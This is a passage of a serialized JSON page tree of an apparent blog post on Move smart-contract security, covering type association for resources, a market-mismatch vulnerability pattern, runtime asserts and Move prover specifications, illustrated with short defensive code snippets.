collateralised_lp_coin",{"type":26,"tag":137,"props":9508,"children":9509},{"style":5590},[9510],{"type":32,"value":7072},{"type":26,"tag":137,"props":9512,"children":9513},{"style":6009},[9514],{"type":32,"value":8386},{"type":26,"tag":137,"props":9516,"children":9517},{"style":5601},[9518],{"type":32,"value":8391},{"type":26,"tag":137,"props":9520,"children":9521},{"style":6009},[9522],{"type":32,"value":8920},{"type":26,"tag":137,"props":9524,"children":9525},{"style":5601},[9526],{"type":32,"value":8391},{"type":26,"tag":137,"props":9528,"children":9529},{"style":6009},[9530],{"type":32,"value":9486},{"type":26,"tag":137,"props":9532,"children":9533},{"style":5601},[9534],{"type":32,"value":9535},">>,\n",{"type":26,"tag":137,"props":9537,"children":9538},{"class":5559,"line":5891},[9539],{"type":26,"tag":137,"props":9540,"children":9541},{"style":5564},[9542],{"type":32,"value":9543},"      /// Mint capability for LP Coin.\n",{"type":26,"tag":137,"props":9545,"children":9546},{"class":5559,"line":5909},[9547,9552,9556,9561,9565,9569,9573,9577],{"type":26,"tag":137,"props":9548,"children":9549},{"style":5584},[9550],{"type":32,"value":9551},"      mint_capability",{"type":26,"tag":137,"props":9553,"children":9554},{"style":5590},[9555],{"type":32,"value":7072},{"type":26,"tag":137,"props":9557,"children":9558},{"style":6009},[9559],{"type":32,"value":9560}," MintCapability",{"type":26,"tag":137,"props":9562,"children":9563},{"style":5601},[9564],{"type":32,"value":8391},{"type":26,"tag":137,"props":9566,"children":9567},{"style":6009},[9568],{"type":32,"value":8920},{"type":26,"tag":137,"props":9570,"children":9571},{"style":5601},[9572],{"type":32,"value":8391},{"type":26,"tag":137,"props":9574,"children":9575},{"style":6009},[9576],{"type":32,"value":9486},{"type":26,"tag":137,"props":9578,"children":9579},{"style":5601},[9580],{"type":32,"value":9535},{"type":26,"tag":137,"props":9582,"children":9583},{"class":5559,"line":5930},[9584],{"type":26,"tag":137,"props":9585,"children":9586},{"style":5564},[9587],{"type":32,"value":9588},"      /// Burn capability for LP Coin.\n",{"type":26,"tag":137,"props":9590,"children":9591},{"class":5559,"line":5939},[9592,9597,9601,9606,9610,9614,9618,9622],{"type":26,"tag":137,"props":9593,"children":9594},{"style":5584},[9595],{"type":32,"value":9596},"      burn_capability",{"type":26,"tag":137,"props":9598,"children":9599},{"style":5590},[9600],{"type":32,"value":7072},{"type":26,"tag":137,"props":9602,"children":9603},{"style":6009},[9604],{"type":32,"value":9605}," BurnCapability",{"type":26,"tag":137,"props":9607,"children":9608},{"style":5601},[9609],{"type":32,"value":8391},{"type":26,"tag":137,"props":9611,"children":9612},{"style":6009},[9613],{"type":32,"value":8920},{"type":26,"tag":137,"props":9615,"children":9616},{"style":5601},[9617],{"type":32,"value":8391},{"type":26,"tag":137,"props":9619,"children":9620},{"style":6009},[9621],{"type":32,"value":9486},{"type":26,"tag":137,"props":9623,"children":9624},{"style":5601},[9625],{"type":32,"value":9535},{"type":26,"tag":137,"props":9627,"children":9628},{"class":5559,"line":6191},[9629],{"type":26,"tag":137,"props":9630,"children":9631},{"emptyLinePlaceholder":18},[9632],{"type":32,"value":6276},{"type":26,"tag":137,"props":9634,"children":9635},{"class":5559,"line":6208},[9636],{"type":26,"tag":137,"props":9637,"children":9638},{"style":5564},[9639],{"type":32,"value":9180},{"type":26,"tag":137,"props":9641,"children":9642},{"class":5559,"line":6225},[9643],{"type":26,"tag":137,"props":9644,"children":9645},{"style":5601},[9646],{"type":32,"value":8457},{"type":26,"tag":35,"props":9648,"children":9649},{},[9650,9652,9657],{"type":32,"value":9651},"When creating a ",{"type":26,"tag":130,"props":9653,"children":9655},{"className":9654},[],[9656],{"type":32,"value":9387},{"type":32,"value":9658},", uniqueness is implicitly enforced by moving it into a hardcoded address.",{"type":26,"tag":5512,"props":9660,"children":9662},{"className":5552,"code":9661,"language":5551,"meta":7,"style":7},"  public(friend) fun create\u003CCoin0>(\n      lp_store: &signer,\n      // ...\n  ) acquires Reserves {\n      lp::assert_is_lp_store(signer::address_of(lp_store));\n\n      // ...\n\n      move_to(lp_store, ReserveCoinContainer\u003CCoin0> {\n        // ...\n      });\n",[9663],{"type":26,"tag":130,"props":9664,"children":9665},{"__ignoreMap":7},[9666,9709,9735,9742,9763,9808,9815,9822,9829,9866,9873],{"type":26,"tag":137,"props":9667,"children":9668},{"class":5559,"line":5560},[9669,9674,9678,9683,9687,9692,9697,9701,9705],{"type":26,"tag":137,"props":9670,"children":9671},{"style":5682},[9672],{"type":32,"value":9673},"  public",{"type":26,"tag":137,"props":9675,"children":9676},{"style":5601},[9677],{"type":32,"value":165},{"type":26,"tag":137,"props":9679,"children":9680},{"style":5584},[9681],{"type":32,"value":9682},"friend",{"type":26,"tag":137,"props":9684,"children":9685},{"style":5601},[9686],{"type":32,"value":5671},{"type":26,"tag":137,"props":9688,"children":9689},{"style":5584},[9690],{"type":32,"value":9691},"fun",{"type":26,"tag":137,"props":9693,"children":9694},{"style":5584},[9695],{"type":32,"value":9696}," create",{"type":26,"tag":137,"props":9698,"children":9699},{"style":5601},[9700],{"type":32,"value":8391},{"type":26,"tag":137,"props":9702,"children":9703},{"style":6009},[9704],{"type":32,"value":9486},{"type":26,"tag":137,"props":9706,"children":9707},{"style":5601},[9708],{"type":32,"value":9172},{"type":26,"tag":137,"props":9710,"children":9711},{"class":5559,"line":5412},[9712,9717,9721,9726,9731],{"type":26,"tag":137,"props":9713,"children":9714},{"style":5584},[9715],{"type":32,"value":9716},"      lp_store",{"type":26,"tag":137,"props":9718,"children":9719},{"style":5590},[9720],{"type":32,"value":7072},{"type":26,"tag":137,"props":9722,"children":9723},{"style":5590},[9724],{"type":32,"value":9725}," &",{"type":26,"tag":137,"props":9727,"children":9728},{"style":5584},[9729],{"type":32,"value":9730},"signer",{"type":26,"tag":137,"props":9732,"children":9733},{"style":5601},[9734],{"type":32,"value":6099},{"type":26,"tag":137,"props":9736,"children":9737},{"class":5559,"line":5417},[9738],{"type":26,"tag":137,"props":9739,"children":9740},{"style":5564},[9741],{"type":32,"value":9180},{"type":26,"tag":137,"props":9743,"children":9744},{"class":5559,"line":5642},[9745,9750,9754,9759],{"type":26,"tag":137,"props":9746,"children":9747},{"style":5601},[9748],{"type":32,"value":9749},"  ) ",{"type":26,"tag":137,"props":9751,"children":9752},{"style":5584},[9753],{"type":32,"value":8929},{"type":26,"tag":137,"props":9755,"children":9756},{"style":6009},[9757],{"type":32,"value":9758}," Reserves",{"type":26,"tag":137,"props":9760,"children":9761},{"style":5601},[9762],{"type":32,"value":5875},{"type":26,"tag":137,"props":9764,"children":9765},{"class":5559,"line":5745},[9766,9771,9775,9780,9785,9789,9794,9798,9803],{"type":26,"tag":137,"props":9767,"children":9768},{"style":5601},[9769],{"type":32,"value":9770},"      lp",{"type":26,"tag":137,"props":9772,"children":9773},{"style":5590},[9774],{"type":32,"value":6072},{"type":26,"tag":137,"props":9776,"children":9777},{"style":5682},[9778],{"type":32,"value":9779},"assert_is_lp_store",{"type":26,"tag":137,"props":9781,"children":9782},{"style":5601},[9783],{"type":32,"value":9784},"(signer",{"type":26,"tag":137,"props":9786,"children":9787},{"style":5590},[9788],{"type":32,"value":6072},{"type":26,"tag":137,"props":9790,"children":9791},{"style":5682},[9792],{"type":32,"value":9793},"address_of",{"type":26,"tag":137,"props":9795,"children":9796},{"style":5601},[9797],{"type":32,"value":165},{"type":26,"tag":137,"props":9799,"children":9800},{"style":5584},[9801],{"type":32,"value":9802},"lp_store",{"type":26,"tag":137,"props":9804,"children":9805},{"style":5601},[9806],{"type":32,"value":9807},"));\n",{"type":26,"tag":137,"props":9809,"children":9810},{"class":5559,"line":5850},[9811],{"type":26,"tag":137,"props":9812,"children":9813},{"emptyLinePlaceholder":18},[9814],{"type":32,"value":6276},{"type":26,"tag":137,"props":9816,"children":9817},{"class":5559,"line":5878},[9818],{"type":26,"tag":137,"props":9819,"children":9820},{"style":5564},[9821],{"type":32,"value":9180},{"type":26,"tag":137,"props":9823,"children":9824},{"class":5559,"line":5891},[9825],{"type":26,"tag":137,"props":9826,"children":9827},{"emptyLinePlaceholder":18},[9828],{"type":32,"value":6276},{"type":26,"tag":137,"props":9830,"children":9831},{"class":5559,"line":5909},[9832,9837,9841,9845,9849,9853,9857,9861],{"type":26,"tag":137,"props":9833,"children":9834},{"style":5682},[9835],{"type":32,"value":9836},"      move_to",{"type":26,"tag":137,"props":9838,"children":9839},{"style":5601},[9840],{"type":32,"value":165},{"type":26,"tag":137,"props":9842,"children":9843},{"style":5584},[9844],{"type":32,"value":9802},{"type":26,"tag":137,"props":9846,"children":9847},{"style":5601},[9848],{"type":32,"value":1108},{"type":26,"tag":137,"props":9850,"children":9851},{"style":6009},[9852],{"type":32,"value":9387},{"type":26,"tag":137,"props":9854,"children":9855},{"style":5601},[9856],{"type":32,"value":8391},{"type":26,"tag":137,"props":9858,"children":9859},{"style":6009},[9860],{"type":32,"value":9486},{"type":26,"tag":137,"props":9862,"children":9863},{"style":5601},[9864],{"type":32,"value":9865},"> {\n",{"type":26,"tag":137,"props":9867,"children":9868},{"class":5559,"line":5930},[9869],{"type":26,"tag":137,"props":9870,"children":9871},{"style":5564},[9872],{"type":32,"value":8760},{"type":26,"tag":137,"props":9874,"children":9875},{"class":5559,"line":5939},[9876],{"type":26,"tag":137,"props":9877,"children":9878},{"style":5601},[9879],{"type":32,"value":9880},"      });\n",{"type":26,"tag":35,"props":9882,"children":9883},{},[9884],{"type":32,"value":9885},"In both these instances, type association only works because we create exactly one instance per type.",{"type":26,"tag":35,"props":9887,"children":9888},{},[9889,9891,9897,9899,9905,9907,9912],{"type":32,"value":9890},"On the other hand, consider if you have a ",{"type":26,"tag":130,"props":9892,"children":9894},{"className":9893},[],[9895],{"type":32,"value":9896},"Position\u003CT>",{"type":32,"value":9898}," and a ",{"type":26,"tag":130,"props":9900,"children":9902},{"className":9901},[],[9903],{"type":32,"value":9904},"Market\u003CT>",{"type":32,"value":9906}," where ",{"type":26,"tag":130,"props":9908,"children":9910},{"className":9909},[],[9911],{"type":32,"value":2064},{"type":32,"value":9913}," is the coin type.",{"type":26,"tag":5512,"props":9915,"children":9917},{"className":5552,"code":9916,"language":5551,"meta":7,"style":7},"    struct Market\u003Cphantom T> {\n        reserves: Coin\u003CT>,\n        // ...\n    }\n\n    struct Position\u003Cphantom T> {\n        amount: u64,\n        // ...\n    }\n",[9918],{"type":26,"tag":130,"props":9919,"children":9920},{"__ignoreMap":7},[9921,9949,9977,9984,9991,9998,10026,10046,10053],{"type":26,"tag":137,"props":9922,"children":9923},{"class":5559,"line":5560},[9924,9928,9933,9937,9941,9945],{"type":26,"tag":137,"props":9925,"children":9926},{"style":5573},[9927],{"type":32,"value":8637},{"type":26,"tag":137,"props":9929,"children":9930},{"style":6009},[9931],{"type":32,"value":9932}," Market",{"type":26,"tag":137,"props":9934,"children":9935},{"style":5601},[9936],{"type":32,"value":8391},{"type":26,"tag":137,"props":9938,"children":9939},{"style":5584},[9940],{"type":32,"value":8396},{"type":26,"tag":137,"props":9942,"children":9943},{"style":6009},[9944],{"type":32,"value":8504},{"type":26,"tag":137,"props":9946,"children":9947},{"style":5601},[9948],{"type":32,"value":9865},{"type":26,"tag":137,"props":9950,"children":9951},{"class":5559,"line":5412},[9952,9957,9961,9965,9969,9973],{"type":26,"tag":137,"props":9953,"children":9954},{"style":5584},[9955],{"type":32,"value":9956},"        reserves",{"type":26,"tag":137,"props":9958,"children":9959},{"style":5590},[9960],{"type":32,"value":7072},{"type":26,"tag":137,"props":9962,"children":9963},{"style":6009},[9964],{"type":32,"value":8386},{"type":26,"tag":137,"props":9966,"children":9967},{"style":5601},[9968],{"type":32,"value":8391},{"type":26,"tag":137,"props":9970,"children":9971},{"style":6009},[9972],{"type":32,"value":2064},{"type":26,"tag":137,"props":9974,"children":9975},{"style":5601},[9976],{"type":32,"value":8723},{"type":26,"tag":137,"props":9978,"children":9979},{"class":5559,"line":5417},[9980],{"type":26,"tag":137,"props":9981,"children":9982},{"style":5564},[9983],{"type":32,"value":8760},{"type":26,"tag":137,"props":9985,"children":9986},{"class":5559,"line":5642},[9987],{"type":26,"tag":137,"props":9988,"children":9989},{"style":5601},[9990],{"type":32,"value":5945},{"type":26,"tag":137,"props":9992,"children":9993},{"class":5559,"line":5745},[9994],{"type":26,"tag":137,"props":9995,"children":9996},{"emptyLinePlaceholder":18},[9997],{"type":32,"value":6276},{"type":26,"tag":137,"props":9999,"children":10000},{"class":5559,"line":5850},[10001,10005,10010,10014,10018,10022],{"type":26,"tag":137,"props":10002,"children":10003},{"style":5573},[10004],{"type":32,"value":8637},{"type":26,"tag":137,"props":10006,"children":10007},{"style":6009},[10008],{"type":32,"value":10009}," Position",{"type":26,"tag":137,"props":10011,"children":10012},{"style":5601},[10013],{"type":32,"value":8391},{"type":26,"tag":137,"props":10015,"children":10016},{"style":5584},[10017],{"type":32,"value":8396},{"type":26,"tag":137,"props":10019,"children":10020},{"style":6009},[10021],{"type":32,"value":8504},{"type":26,"tag":137,"props":10023,"children":10024},{"style":5601},[10025],{"type":32,"value":9865},{"type":26,"tag":137,"props":10027,"children":10028},{"class":5559,"line":5878},[10029,10034,10038,10042],{"type":26,"tag":137,"props":10030,"children":10031},{"style":5584},[10032],{"type":32,"value":10033},"        amount",{"type":26,"tag":137,"props":10035,"children":10036},{"style":5590},[10037],{"type":32,"value":7072},{"type":26,"tag":137,"props":10039,"children":10040},{"style":6009},[10041],{"type":32,"value":8445},{"type":26,"tag":137,"props":10043,"children":10044},{"style":5601},[10045],{"type":32,"value":6099},{"type":26,"tag":137,"props":10047,"children":10048},{"class":5559,"line":5891},[10049],{"type":26,"tag":137,"props":10050,"children":10051},{"style":5564},[10052],{"type":32,"value":8760},{"type":26,"tag":137,"props":10054,"children":10055},{"class":5559,"line":5909},[10056],{"type":26,"tag":137,"props":10057,"children":10058},{"style":5601},[10059],{"type":32,"value":5945},{"type":26,"tag":35,"props":10061,"children":10062},{},[10063,10065,10070,10072,10077],{"type":32,"value":10064},"If ",{"type":26,"tag":130,"props":10066,"children":10068},{"className":10067},[],[10069],{"type":32,"value":9904},{"type":32,"value":10071}," isn't a unique type -- or in other words if you're able to create more than one instance of a market per type ",{"type":26,"tag":130,"props":10073,"children":10075},{"className":10074},[],[10076],{"type":32,"value":2064},{"type":32,"value":10078}," -- you might be able to pass in the incorrect market for a given position. This is a common vulnerability pattern on Solana.",{"type":26,"tag":35,"props":10080,"children":10081},{},[10082],{"type":32,"value":10083},"Dynamic iteration of types is also impossible (at least as currently designed by the Move VM) leading to massive headaches for developers. In these scenarios, we empirically observe developers defaulting back to type reflection APIs, complicating code unnecessarily. Security at the expense of usability comes at the expense of security.",{"type":26,"tag":5512,"props":10085,"children":10087},{"className":5552,"code":10086,"language":5551,"meta":7,"style":7},"    /// Get the price of the token per lamport.\n    public fun get_price(type_info: TypeInfo): Decimal acquires Oracle {\n        let oracle = borrow_global_mut\u003COracle>(@oracle);\n        let price = table::borrow_mut_with_default\u003CTypeInfo, Decimal>(\n            &mut oracle.prices,\n            type_info,\n            decimal::one()\n        );\n        *price\n    }\n",[10088],{"type":26,"tag":130,"props":10089,"children":10090},{"__ignoreMap":7},[10091,10099,10161,10210,10262,10287,10299,10321,10329,10342],{"type":26,"tag":137,"props":10092,"children":10093},{"class":5559,"line":5560},[10094],{"type":26,"tag":137,"props":10095,"children":10096},{"style":5564},[10097],{"type":32,"value":10098},"    /// Get the price of the token per lamport.\n",{"type":26,"tag":137,"props":10100,"children":10101},{"class":5559,"line":5412},[10102,10107,10111,10116,10120,10125,10129,10134,10138,10142,10147,10152,10157],{"type":26,"tag":137,"props":10103,"children":10104},{"style":5584},[10105],{"type":32,"value":10106},"    public",{"type":26,"tag":137,"props":10108,"children":10109},{"style":5584},[10110],{"type":32,"value":8792},{"type":26,"tag":137,"props":10112,"children":10113},{"style":5682},[10114],{"type":32,"value":10115}," get_price",{"type":26,"tag":137,"props":10117,"children":10118},{"style":5601},[10119],{"type":32,"value":165},{"type":26,"tag":137,"props":10121,"children":10122},{"style":5584},[10123],{"type":32,"value":10124},"type_info",{"type":26,"tag":137,"props":10126,"children":10127},{"style":5590},[10128],{"type":32,"value":7072},{"type":26,"tag":137,"props":10130,"children":10131},{"style":6009},[10132],{"type":32,"value":10133}," TypeInfo",{"type":26,"tag":137,"props":10135,"children":10136},{"style":5601},[10137],{"type":32,"value":200},{"type":26,"tag":137,"props":10139,"children":10140},{"style":5590},[10141],{"type":32,"value":7072},{"type":26,"tag":137,"props":10143,"children":10144},{"style":6009},[10145],{"type":32,"value":10146}," Decimal",{"type":26,"tag":137,"props":10148,"children":10149},{"style":5584},[10150],{"type":32,"value":10151}," acquires",{"type":26,"tag":137,"props":10153,"children":10154},{"style":6009},[10155],{"type":32,"value":10156}," Oracle",{"type":26,"tag":137,"props":10158,"children":10159},{"style":5601},[10160],{"type":32,"value":5875},{"type":26,"tag":137,"props":10162,"children":10163},{"class":5559,"line":5417},[10164,10168,10173,10177,10182,10186,10191,10196,10201,10206],{"type":26,"tag":137,"props":10165,"children":10166},{"style":5573},[10167],{"type":32,"value":5648},{"type":26,"tag":137,"props":10169,"children":10170},{"style":5584},[10171],{"type":32,"value":10172}," oracle",{"type":26,"tag":137,"props":10174,"children":10175},{"style":5590},[10176],{"type":32,"value":5593},{"type":26,"tag":137,"props":10178,"children":10179},{"style":5584},[10180],{"type":32,"value":10181}," borrow_global_mut",{"type":26,"tag":137,"props":10183,"children":10184},{"style":5601},[10185],{"type":32,"value":8391},{"type":26,"tag":137,"props":10187,"children":10188},{"style":6009},[10189],{"type":32,"value":10190},"Oracle",{"type":26,"tag":137,"props":10192,"children":10193},{"style":5601},[10194],{"type":32,"value":10195},">(",{"type":26,"tag":137,"props":10197,"children":10198},{"style":5590},[10199],{"type":32,"value":10200},"@",{"type":26,"tag":137,"props":10202,"children":10203},{"style":5584},[10204],{"type":32,"value":10205},"oracle",{"type":26,"tag":137,"props":10207,"children":10208},{"style":5601},[10209],{"type":32,"value":6430},{"type":26,"tag":137,"props":10211,"children":10212},{"class":5559,"line":5642},[10213,10217,10222,10226,10231,10235,10240,10244,10249,10253,10258],{"type":26,"tag":137,"props":10214,"children":10215},{"style":5573},[10216],{"type":32,"value":5648},{"type":26,"tag":137,"props":10218,"children":10219},{"style":5584},[10220],{"type":32,"value":10221}," price",{"type":26,"tag":137,"props":10223,"children":10224},{"style":5590},[10225],{"type":32,"value":5593},{"type":26,"tag":137,"props":10227,"children":10228},{"style":5601},[10229],{"type":32,"value":10230}," table",{"type":26,"tag":137,"props":10232,"children":10233},{"style":5590},[10234],{"type":32,"value":6072},{"type":26,"tag":137,"props":10236,"children":10237},{"style":5584},[10238],{"type":32,"value":10239},"borrow_mut_with_default",{"type":26,"tag":137,"props":10241,"children":10242},{"style":5601},[10243],{"type":32,"value":8391},{"type":26,"tag":137,"props":10245,"children":10246},{"style":6009},[10247],{"type":32,"value":10248},"TypeInfo",{"type":26,"tag":137,"props":10250,"children":10251},{"style":5601},[10252],{"type":32,"value":1108},{"type":26,"tag":137,"props":10254,"children":10255},{"style":6009},[10256],{"type":32,"value":10257},"Decimal",{"type":26,"tag":137,"props":10259,"children":10260},{"style":5601},[10261],{"type":32,"value":9172},{"type":26,"tag":137,"props":10263,"children":10264},{"class":5559,"line":5745},[10265,10270,10274,10278,10282],{"type":26,"tag":137,"props":10266,"children":10267},{"style":5590},[10268],{"type":32,"value":10269},"            &",{"type":26,"tag":137,"props":10271,"children":10272},{"style":5573},[10273],{"type":32,"value":6325},{"type":26,"tag":137,"props":10275,"children":10276},{"style":5584},[10277],{"type":32,"value":10172},{"type":26,"tag":137,"props":10279,"children":10280},{"style":5590},[10281],{"type":32,"value":470},{"type":26,"tag":137,"props":10283,"children":10284},{"style":5601},[10285],{"type":32,"value":10286},"prices,\n",{"type":26,"tag":137,"props":10288,"children":10289},{"class":5559,"line":5850},[10290,10295],{"type":26,"tag":137,"props":10291,"children":10292},{"style":5584},[10293],{"type":32,"value":10294},"            type_info",{"type":26,"tag":137,"props":10296,"children":10297},{"style":5601},[10298],{"type":32,"value":6099},{"type":26,"tag":137,"props":10300,"children":10301},{"class":5559,"line":5878},[10302,10307,10311,10316],{"type":26,"tag":137,"props":10303,"children":10304},{"style":5601},[10305],{"type":32,"value":10306},"            decimal",{"type":26,"tag":137,"props":10308,"children":10309},{"style":5590},[10310],{"type":32,"value":6072},{"type":26,"tag":137,"props":10312,"children":10313},{"style":5682},[10314],{"type":32,"value":10315},"one",{"type":26,"tag":137,"props":10317,"children":10318},{"style":5601},[10319],{"type":32,"value":10320},"()\n",{"type":26,"tag":137,"props":10322,"children":10323},{"class":5559,"line":5891},[10324],{"type":26,"tag":137,"props":10325,"children":10326},{"style":5601},[10327],{"type":32,"value":10328},"        );\n",{"type":26,"tag":137,"props":10330,"children":10331},{"class":5559,"line":5909},[10332,10337],{"type":26,"tag":137,"props":10333,"children":10334},{"style":5590},[10335],{"type":32,"value":10336},"        *",{"type":26,"tag":137,"props":10338,"children":10339},{"style":5584},[10340],{"type":32,"value":10341},"price\n",{"type":26,"tag":137,"props":10343,"children":10344},{"class":5559,"line":5930},[10345],{"type":26,"tag":137,"props":10346,"children":10347},{"style":5601},[10348],{"type":32,"value":5945},{"type":26,"tag":35,"props":10350,"children":10351},{},[10352,10354,10359],{"type":32,"value":10353},"Type association feels like a proxy for the intended pattern -- associating resources with instances. It's very useful being able to store a reference to an ",{"type":26,"tag":762,"props":10355,"children":10356},{},[10357],{"type":32,"value":10358},"instance",{"type":32,"value":10360}," of another resource (which is possible in Diem style move).",{"type":26,"tag":35,"props":10362,"children":10363},{},[10364],{"type":32,"value":10365},"In summary, when using type systems to bind resources to each other, it's important to either",{"type":26,"tag":4820,"props":10367,"children":10368},{},[10369,10374],{"type":26,"tag":3430,"props":10370,"children":10371},{},[10372],{"type":32,"value":10373},"Have unique initializers for your resources",{"type":26,"tag":3430,"props":10375,"children":10376},{},[10377],{"type":32,"value":10378},"Associate resources with instances directly",{"type":26,"tag":92,"props":10380,"children":10382},{"id":10381},"formal-verification",[10383],{"type":32,"value":10384},"Formal Verification",{"type":26,"tag":35,"props":10386,"children":10387},{},[10388],{"type":32,"value":10389},"Formal verification is another exciting feature.",{"type":26,"tag":35,"props":10391,"children":10392},{},[10393],{"type":32,"value":10394},"As part of our work with protocols, we actively use formal verification to prove aspects of security.",{"type":26,"tag":35,"props":10396,"children":10397},{},[10398,10400,10405],{"type":32,"value":10399},"However, this isn't a silver bullet. The key is figuring out ",{"type":26,"tag":762,"props":10401,"children":10402},{},[10403],{"type":32,"value":10404},"what",{"type":32,"value":10406}," to prove.",{"type":26,"tag":35,"props":10408,"children":10409},{},[10410,10412,10419],{"type":32,"value":10411},"One obvious idea might be a properties across a particular function. For example, we might want to ensure that a swap doesn't reduce the value of the pool -- similar to the ",{"type":26,"tag":41,"props":10413,"children":10416},{"href":10414,"rel":10415},"https://osec.io/blog/reports/2022-04-26-spl-swap-rounding/",[45],[10417],{"type":32,"value":10418},"Solana AMM rounding issue",{"type":32,"value":10420}," we reported.",{"type":26,"tag":35,"props":10422,"children":10423},{},[10424],{"type":32,"value":10425},"However, this could also be checked with a simple runtime assert. For example, we recommended Pontem assert that liquidity pool token values are strictly increasing.",{"type":26,"tag":5512,"props":10427,"children":10429},{"className":5552,"code":10428,"language":5551,"meta":7,"style":7},"  let cmp = u256::compare(&lp_value_after_swap_and_fee, &lp_value_before_swap_u256);\n  assert!(cmp == 2, ERR_INCORRECT_SWAP);\n",[10430],{"type":26,"tag":130,"props":10431,"children":10432},{"__ignoreMap":7},[10433,10494],{"type":26,"tag":137,"props":10434,"children":10435},{"class":5559,"line":5560},[10436,10441,10446,10450,10455,10459,10464,10468,10472,10477,10481,10485,10490],{"type":26,"tag":137,"props":10437,"children":10438},{"style":5573},[10439],{"type":32,"value":10440},"  let",{"type":26,"tag":137,"props":10442,"children":10443},{"style":5584},[10444],{"type":32,"value":10445}," cmp",{"type":26,"tag":137,"props":10447,"children":10448},{"style":5590},[10449],{"type":32,"value":5593},{"type":26,"tag":137,"props":10451,"children":10452},{"style":5601},[10453],{"type":32,"value":10454}," u256",{"type":26,"tag":137,"props":10456,"children":10457},{"style":5590},[10458],{"type":32,"value":6072},{"type":26,"tag":137,"props":10460,"children":10461},{"style":5682},[10462],{"type":32,"value":10463},"compare",{"type":26,"tag":137,"props":10465,"children":10466},{"style":5601},[10467],{"type":32,"value":165},{"type":26,"tag":137,"props":10469,"children":10470},{"style":5590},[10471],{"type":32,"value":5694},{"type":26,"tag":137,"props":10473,"children":10474},{"style":5584},[10475],{"type":32,"value":10476},"lp_value_after_swap_and_fee",{"type":26,"tag":137,"props":10478,"children":10479},{"style":5601},[10480],{"type":32,"value":1108},{"type":26,"tag":137,"props":10482,"children":10483},{"style":5590},[10484],{"type":32,"value":5694},{"type":26,"tag":137,"props":10486,"children":10487},{"style":5584},[10488],{"type":32,"value":10489},"lp_value_before_swap_u256",{"type":26,"tag":137,"props":10491,"children":10492},{"style":5601},[10493],{"type":32,"value":6430},{"type":26,"tag":137,"props":10495,"children":10496},{"class":5559,"line":5412},[10497,10502,10506,10511,10515,10520],{"type":26,"tag":137,"props":10498,"children":10499},{"style":5682},[10500],{"type":32,"value":10501},"  assert!",{"type":26,"tag":137,"props":10503,"children":10504},{"style":5601},[10505],{"type":32,"value":165},{"type":26,"tag":137,"props":10507,"children":10508},{"style":5584},[10509],{"type":32,"value":10510},"cmp",{"type":26,"tag":137,"props":10512,"children":10513},{"style":5590},[10514],{"type":32,"value":5866},{"type":26,"tag":137,"props":10516,"children":10517},{"style":5626},[10518],{"type":32,"value":10519}," 2",{"type":26,"tag":137,"props":10521,"children":10522},{"style":5601},[10523],{"type":32,"value":10524},", ERR_INCORRECT_SWAP);\n",{"type":26,"tag":35,"props":10526,"children":10527},{},[10528,10530,10535],{"type":32,"value":10529},"The move prover really shines when we're proving relationships ",{"type":26,"tag":762,"props":10531,"children":10532},{},[10533],{"type":32,"value":10534},"between",{"type":32,"value":10536}," functions.",{"type":26,"tag":35,"props":10538,"children":10539},{},[10540,10542,10548],{"type":32,"value":10541},"One example of a more complicated relationship that can't be proved easily via assertions would be the ",{"type":26,"tag":130,"props":10543,"children":10545},{"className":10544},[],[10546],{"type":32,"value":10547},"no_free_money_theorem",{"type":32,"value":10549}," in the move repository.",{"type":26,"tag":5512,"props":10551,"children":10553},{"className":5552,"code":10552,"language":5551,"meta":7,"style":7},"  // #[test] // TODO: cannot specify the test-only functions\n  fun no_free_money_theorem(coin1_in: u64, coin2_in: u64): (u64, u64) acquires Pool {\n      let share = add_liquidity(coin1_in, coin2_in);\n      remove_liquidity(share)\n  }\n  spec no_free_money_theorem {\n      pragma verify=false;\n      ensures result_1 \u003C= coin1_in;\n      ensures result_2 \u003C= coin2_in;\n  }\n",[10554],{"type":26,"tag":130,"props":10555,"children":10556},{"__ignoreMap":7},[10557,10565,10653,10695,10716,10723,10739,10765,10792,10817],{"type":26,"tag":137,"props":10558,"children":10559},{"class":5559,"line":5560},[10560],{"type":26,"tag":137,"props":10561,"children":10562},{"style":5564},[10563],{"type":32,"value":10564},"  // #[test] // TODO: cannot specify the test-only functions\n",{"type":26,"tag":137,"props":10566,"children":10567},{"class":5559,"line":5412},[10568,10572,10577,10581,10586,10590,10594,10598,10603,10607,10611,10615,10619,10623,10628,10632,10636,10640,10644,10649],{"type":26,"tag":137,"props":10569,"children":10570},{"style":5584},[10571],{"type":32,"value":9153},{"type":26,"tag":137,"props":10573,"children":10574},{"style":5682},[10575],{"type":32,"value":10576}," no_free_money_theorem",{"type":26,"tag":137,"props":10578,"children":10579},{"style":5601},[10580],{"type":32,"value":165},{"type":26,"tag":137,"props":10582,"children":10583},{"style":5584},[10584],{"type":32,"value":10585},"coin1_in",{"type":26,"tag":137,"props":10587,"children":10588},{"style":5590},[10589],{"type":32,"value":7072},{"type":26,"tag":137,"props":10591,"children":10592},{"style":6009},[10593],{"type":32,"value":8445},{"type":26,"tag":137,"props":10595,"children":10596},{"style":5601},[10597],{"type":32,"value":1108},{"type":26,"tag":137,"props":10599,"children":10600},{"style":5584},[10601],{"type":32,"value":10602},"coin2_in",{"type":26,"tag":137,"props":10604,"children":10605},{"style":5590},[10606],{"type":32,"value":7072},{"type":26,"tag":137,"props":10608,"children":10609},{"style":6009},[10610],{"type":32,"value":8445},{"type":26,"tag":137,"props":10612,"children":10613},{"style":5601},[10614],{"type":32,"value":200},{"type":26,"tag":137,"props":10616,"children":10617},{"style":5590},[10618],{"type":32,"value":7072},{"type":26,"tag":137,"props":10620,"children":10621},{"style":5601},[10622],{"type":32,"value":4625},{"type":26,"tag":137,"props":10624,"children":10625},{"style":6009},[10626],{"type":32,"value":10627},"u64",{"type":26,"tag":137,"props":10629,"children":10630},{"style":5601},[10631],{"type":32,"value":1108},{"type":26,"tag":137,"props":10633,"children":10634},{"style":6009},[10635],{"type":32,"value":10627},{"type":26,"tag":137,"props":10637,"children":10638},{"style":5601},[10639],{"type":32,"value":5671},{"type":26,"tag":137,"props":10641,"children":10642},{"style":5584},[10643],{"type":32,"value":8929},{"type":26,"tag":137,"props":10645,"children":10646},{"style":6009},[10647],{"type":32,"value":10648}," Pool",{"type":26,"tag":137,"props":10650,"children":10651},{"style":5601},[10652],{"type":32,"value":5875},{"type":26,"tag":137,"props":10654,"children":10655},{"class":5559,"line":5417},[10656,10661,10666,10670,10675,10679,10683,10687,10691],{"type":26,"tag":137,"props":10657,"children":10658},{"style":5573},[10659],{"type":32,"value":10660},"      let",{"type":26,"tag":137,"props":10662,"children":10663},{"style":5584},[10664],{"type":32,"value":10665}," 